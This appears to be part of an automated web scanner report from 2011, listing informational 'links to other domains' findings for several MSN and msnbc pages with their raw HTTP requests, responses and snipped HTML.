<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5926146-rumor-facebook-phones-are-coming" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5927996" data-contentId="5927996" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="wbenedetti/5927996.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/wbenedetti/5927996.jpg" width="280" height="173" alt="" /><p class="photo_credit">
...[SNIP]...
<p>The Sony Ericsson Xperia Play phone has run rampant in the rumor mill for months now, but <a target="_blank" href="http://www.engadget.com/2011/01/26/sony-ericsson-xperia-play-playstation-phone-preview/">Engadget reports</a>
...[SNIP]...
<p>Engadget reminds readers that "what we're seeing here is subject to changes." They expect Sony to reveal many of the final details about the phone at the <a target="_blank" href="http://www.mobileworldcongress.com/">Mobile World Congress taking place in Spain</a>
...[SNIP]...
<p>Check out the entirety of Engadget's coverage and their many photos of the device <a target="_blank" href="http://www.engadget.com/2011/01/26/sony-ericsson-xperia-play-playstation-phone-preview/">here</a>
...[SNIP]...
</em><a target="_blank" href="http://bit.ly/caLhBE"><i>
...[SNIP]...
</i><a target="_blank" href="http://twitter.com/WindaBenedetti"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://ingame.msnbc.redacted/_news/2011/01/26/5926152-sonys-playstation-phone-is-for-real?chromedomain=technolog" data-Text="Sony's PlayStation phone is for real">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://ingame.msnbc.redacted/_news/2011/01/26/5926152-sonys-playstation-phone-is-for-real?chromedomain=technolog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<div id="vine-inlinePhoto__5925431" data-contentId="5925431" class="inlinePhoto photo_landscape photo_align_right user_inline_photo" style="width:280px;"><img id="suzanne-choney/5925431.jpg" src="http://www.polls.newsvine.com/_vine/images/users/nws/suzanne-choney/5925431.jpg" width="280" height="157" alt="" />
...[SNIP]...
<p>It doesn't appear to be a huge issue, but it is an irritating one — many Facebook users have shared their befuddlement on <a href="http://www.facebook.com/topic.php?uid=31987371885&topic=14747&post=70129">Facebook's discussion page</a>
...[SNIP]...
<p>Hat tip to <a href="http://valleywag.gawker.com/5743293/facebook-mobile-says-to-call-911">Valleywag</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5925380-ignore-facebook-messages-to-call-911-" data-Text="Ignore Facebook messages to call 911 ">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5925380-ignore-facebook-messages-to-call-911-" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<p>It's all part of Facebook's "Data Privacy Day" celebration, a poorly promoted — <a href="http://dataprivacyday2010.org/about/">yet totally real</a>
...[SNIP]...
<p>According to <a href="http://blog.facebook.com/blog.php?post=486790652130">Facebook's Data Privacy Day blog post</a>
...[SNIP]...
<strong>Here's some other known bugs <a href="http://www.facebook.com/help/?search=known+issues#!/help/?page=777">Facebook is actively dealing with right now</a>
...[SNIP]...
<p>And in the grand spirit of Data Privacy Day, <a href="http://blog.facebook.com/blog.php?post=436800707130">here's some current Facebook security information you should know</a>
...[SNIP]...
</em><a href="http://twitter.com/helenaspopkin"><i>
...[SNIP]...
</em><a href="http://www.facebook.com/pages/manage/#!/pages/Helen-AS-Popkin/120508047967128"><i>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="msnbc_tech" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://technolog.msnbc.redacted/_news/2011/01/26/5925209-locked-out-of-facebook-happy-data-privacy-day-" data-Text="Locked out of Facebook? Happy 'Data Privacy Day!' ">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.redacted/_news/2011/01/26/5925209-locked-out-of-facebook-happy-data-privacy-day-" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://michaelwann.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/MichaelWann">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://technolog2.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg" width="60" height="60" /></a>
...[SNIP]...
from Time and the NYT to the notorious tech blog Gizmodo, where he was features editor for three years. He is not an Apple fanboy, but sometimes he is mistaken for one. You can stalk him on Twitter at <a href="http://twitter.com/wjrothman">@wjrothman</a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/wjrothman">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://helenaspopkin.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://twitter.com/HelenASPopkin">Follow on Twitter</a>
...[SNIP]...
<li class="facebook"><a href="http://www.facebook.com/HelenASPopkin">Become a fan on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://suzanne-choney.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="twitter"><a href="http://www.twitter.com/suzannechoney">Follow on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://alex-johnson.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://malexj.wordpress.com/">Editor at Large</a>
...[SNIP]...
<li class="follow on twitter"><a href="http://www.twitter.com/MAlexJohnson">Follow on Twitter</a>
...[SNIP]...
<li class="follow on facebook"><a href="http://malexj.tk/6M">Follow on Facebook</a>
...[SNIP]...
<div class="avatar"><a href="http://redtape.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://wbenedetti.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg" width="60" height="60" /></a>
...[SNIP]...
<li class="follow winda benedetti on twitter"><a href="http://twitter.com/windabenedetti">follow Winda Benedetti on Twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://toddkenreck.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://ingame.newsvine.com/">In-Game</a>
...[SNIP]...
<li class="todd kenreck on facebook"><a href="http://www.facebook.com/todd.kenreck">Todd Kenreck on facebook</a>
...[SNIP]...
<li class="todd kenreck on twitter"><a href="https://twitter.com/ToddKenreck">Todd Kenreck on twitter</a>
...[SNIP]...
<div class="avatar"><a href="http://athima-chansanchai.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.348. http://theinvestedlife.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://theinvestedlife.redacted
Path:	/

Issue detail

The page was loaded from a URL containing a query string:

http://theinvestedlife.redacted/?source=msnmoney

The response contains the following links to other domains:

http://ad.doubleclick.net/clk;228891279;51205649;t
http://advertising.microsoft.com/home/home
http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js
http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js
http://analytics.live.com/Analytics/wlAnalytics.js
http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=&c7=&c15=&cv=1.3&cj=1
http://c.live.com/c.gif?DI=15666
http://download.live.com/?sku=messenger
http://fls.doubleclick.net/activityi;src=1620481;type=tdame177;cat=conte520;ord=1;num=1?
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/help.aspx?project=tou
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://twitter.com/theinvestedlife
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/pages/The-Invested-Life/149304748418908
http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx
http://www.msnbc.com/
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /?source=msnmoney HTTP/1.1
Host: theinvestedlife.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=793
Content-Length: 27793
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 02:04:21 GMT
Last-Modified: Sun, 30 Jan 2011 01:49:21 GMT
Server: Microsoft-IIS/7.5
Vary: *
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 01:51:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/">
...[SNIP]...
<div id="wrapperTracking"><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/2/743550/randm.js"></script>
...[SNIP]...
<noscript><iframe style="position:absolute" src="http://fls.doubleclick.net/activityi;src=1620481;type=tdame177;cat=conte520;ord=1;num=1?" width="1" height="0" frameborder="0"></iframe>
...[SNIP]...
<li><a href="http://www.bltwy.com" target="_blank">BLTWY</a>
...[SNIP]...
<li class="menuItem"><a href="http://msn.foxsports.com/" target="_blank">Sports</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/mlb" target="_blank">MLB</a></li><li><a href="http://msn.foxsports.com/nascar " target="_blank">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba" target="_blank">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball" target="_blank">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb" target="_blank">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl" target="_blank">NFL</a></li><li><a href="http://msn.foxsports.com/nhl" target="_blank">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy" target="_blank">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer" target="_blank">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp" target="_blank">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" target="_blank">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/" target="_blank"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " target="_blank"> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" target="_blank">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" target="_blank">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com" target="_blank">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/" target="_blank">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/" target="_blank">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2" target="_blank">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " target="_blank">Travel</a>
...[SNIP]...
</div><a href="http://www.bing.com/" id="bingLogo" target="_blank">Bing</a></div><div id="msnHeaderRight"><a href="http://mail.live.com/" id="hotmailLink" class="divRight" target="_blank">Hotmail</a><a href="http://download.live.com/?sku=messenger" id="messengerLink" target="_blank">Messenger</a>
...[SNIP]...
<div id="tdaLogo"><a href="http://ad.doubleclick.net/clk;228891279;51205649;t" target="_blank" ><img src="http://blstb.redacted/i/4D/B7C87BC03E7E59C973DC6F7A93D0F4.png" title="The Invested Life" alt="The Invested Life"/>
...[SNIP]...
</div><a href="http://twitter.com/theinvestedlife" title="Follow Us" target="_blank" >Follow Us</a>
...[SNIP]...
</div><a href="http://www.facebook.com/pages/The-Invested-Life/149304748418908"..title="Become a Fan" target="_blank" >Become a Fan</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_blank">MSN Privacy</a>
...[SNIP]...
<li><a href="http://help.live.com/help.aspx?project=tou" target="_blank">Terms of Use</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/home/home" target="_blank">Advertise</a>
...[SNIP]...
<li><a href="http://www.microsoft.com/library/toolbar/3.0/trademarks/en-us.mspx" target="_blank">Trademark</a>
...[SNIP]...
<div class="msnBCContainer"><a href="http://www.msnbc.com/" id="MsnBCHref" title="Go to msnbc.com" alt="Go to msnbc.com" target="_blank" ><div class="msnBC">
...[SNIP]...
</div><script type="text/javascript" src="http://amch.questionmarket.com/adsc/d743529/3/743551/randm.js"></script><script type="text/javascript" src="http://analytics.live.com/Analytics/wlAnalytics.js"></script>
...[SNIP]...
<noscript><img src="http://c.live.com/c.gif?DI=15666"/></noscript>
...[SNIP]...
<noscript><img src="http://b.scorecardresearch.com/b?c1=2&c2=&c3=&c4=&c7=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" /></noscript>
...[SNIP]...

22.349. http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://this.content.served.by.adshuffle.com
Path:	/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt

Issue detail

The page was loaded from a URL containing a query string:

http://this.content.served.by.adshuffle.com/p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt?searchFirstName=&searchLastName=&searchAge=\r\naction=peopleSearch_wp_resultcount&city=&mname=&wel_age=0&peopleSearchFrom=wp&wel_fname=&wel_lname=&state=&x=0&y=0\

The response contains the following link to another domain:

http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1&searchFirstName=&searchLastName=&searchAge=%5Cr%5Cnaction=peopleSearch_wp_resultcount&city=&mname=&wel_age=0&peopleSearchFrom=wp&wel_fname=&wel_lname=&state=&x=0&y=0%5C

Request

GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt?searchFirstName=&searchLastName=&searchAge=\r\naction=peopleSearch_wp_resultcount&city=&mname=&wel_age=0&peopleSearchFrom=wp&wel_fname=&wel_lname=&state=&x=0&y=0\ HTTP/1.1
Host: this.content.served.by.adshuffle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;

Response

HTTP/1.1 302 Found
Cache-Control: private, no-cache="Set-Cookie"
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:51:08 GMT
Location: http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1&searchFirstName=&searchLastName=&searchAge=%5Cr%5Cnaction=peopleSearch_wp_resultcount&city=&mname=&wel_age=0&peopleSearchFrom=wp&wel_fname=&wel_lname=&state=&x=0&y=0%5C
Server: Microsoft-IIS/7.0
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: ac1=51f37.61f6d=0129111951; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0|c51F37:61F6D_0_0_0_20BC47_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/
Date: Sun, 30 Jan 2011 01:51:08 GMT
Content-Length: 443
Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:08 GMT;path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1&searchFirstName=&searchLastName=&searchAge=%5Cr%5Cnaction=peopleSearch_wp_resultcount&city=&mname=&wel_age=0&peopleSearchFrom=wp&wel_fname=&wel_lname=&state=&x=0&y=0%5C">here</a>
...[SNIP]...

22.350. http://tv.redacted/tv/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tv.redacted
Path:	/tv/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://tv.redacted/tv/article.aspx?news=625552&gt1=28103

The response contains the following links to other domains:

http://choice.live.com/default.aspx
http://download.live.com/?sku=messenger
http://entcss.s-redacted/App_Themes/IE7/IE79613.css
http://entcss.s-redacted/styles/entertainment9613.css
http://entcss.s-redacted/styles/gtl_sitegeneric9613.css
http://entcss.s-redacted/styles/tvvertical9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-redacted/i/150/News/May10/Charlie_Sheen_150.jpg
http://entimg.s-redacted/i/grandprix/Digg.gif
http://entimg.s-redacted/i/grandprix/discuss.gif
http://entimg.s-redacted/i/grandprix/leftNavBg.gif
http://entimg.s-redacted/i/grandprix/leftNavSeperator.gif
http://entimg.s-redacted/i/grandprix/mail.gif
http://entimg.s-redacted/i/grandprix/msft.png
http://entimg.s-redacted/i/grandprix/nav_pipe.gif
http://entimg.s-redacted/i/grandprix/spacesBlog.gif
http://entimg.s-redacted/i/ms/RssIcon.gif
http://entimg.s-redacted/i/ms/ms_logo.gif
http://entimg.s-redacted/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://img.widgets.video.s-redacted/js/ch/channels.css
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=BC
http://www.bing.com/search?q=Charlie+Sheen&form=msnena
http://www.bing.com/search?q=charlie+sheen%27s+woes&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse/Sundance
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/share.php?u=http%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26affid%3dfb
http://www.myhomeredacted/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296406730&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Ftv.msn.com%2Ftv%2Farticle.aspx%3Fnews%3D625552%26gt1%3D28103&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2ftv.redacted%2ftv%2farticle.aspx%3fnews%3d625552%26gt1%3d28103%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /tv/article.aspx?news=625552&gt1=28103 HTTP/1.1
Host: tv.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 54864
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=fc9fd5bcf01942bab7d2e4a6851604f1; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Sun, 30 Jan 2011 16:58:50 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Source: Sh
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/tvvertical9613.css" rev="stylesheet" type="text/css"/>

<style>
...[SNIP]...
</style>

<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><SCRIPT language=JavaScript src="http://entimg.msn.com/i/jScript/addCSSandSCRIPTtoHEAD.js" type=text/javascript>
